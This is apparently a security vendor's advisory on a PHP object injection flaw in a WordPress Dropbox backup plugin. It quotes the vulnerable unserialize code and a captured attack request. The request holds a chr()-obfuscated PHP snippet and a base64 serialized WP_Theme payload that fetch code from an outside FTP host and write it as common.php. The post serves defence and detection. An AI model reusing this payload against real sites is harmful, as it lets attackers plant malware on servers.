Top

common.php (Object Injection Vulnerability in Backup & Restore Dropbox)

WordPress plugin Backup & Restore Dropbox have PHP Object Injection Vulnerability. It’s allow remote download malware to the server. We found it download common.php malware to server via FTP.

dropbox-backup.php

In the plugin file /wp-content/plugins/dropbox-backup/dropbox-backup.php the function wpadm_full_backup_dropbox_run() gets registered to run during init (so it runs whenever WordPress loads):

add_action('init', 'wpadm_full_backup_dropbox_run');

That function then causes the function wpadm_run() to run:

function wpadm_full_backup_dropbox_run()
{
	wpadm_run('dropbox-backup', dirname(__FILE__));
}

wpadm.php

When that function runs, if there is a POST input “dropbox-backup_request” included with the request to the website it will pass it to the function wpadm_unpack() (in the file /wp-content/plugins/dropbox-backup/functions/wpadm.php):

function  wpadm_run($pl, $dir) {
.
.
$params = wpadm_unpack($_POST[$request_name]);
.
.
}

That in turns causes the POST input “dropbox-backup_request” to be run through the function unserialize,which allows the possibility of PHP object injection to occur:

function wpadm_unpack( $str ) {
	return unserialize( base64_decode( $str ) );
}

Real Post Payload

--5232150d-B--
POST / HTTP/1.1
Accept-Encoding: identity
Content-Length: 791
Host: malware.expert
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
Connection: close
Cookie: cmd=echo%208a44d571857dd91b3fca6d302776b2ea; code=%24str%3Dfile_get_coNteNts%28chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29.chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29.chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29.chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29.chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+file_put_coNteNts%28ABSPATH.chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29.chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29.chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;

First file_get_contents download common.php malware and file_put_contents write it to server.

Content-Type: application/x-www-form-urlencoded

--5232150d-C--
dropbox-backup_request=YToyOntzOjY6Im1ldGhvZCI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX1zOjY6InBhcmFtcyI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX19

dropbox-backup_request decoded

Array
(
    [method] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

    [params] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

)

Use Malware Expert Signatures to detect this malware from PHP files and clean them up.

, , , , , ,

Comments are closed.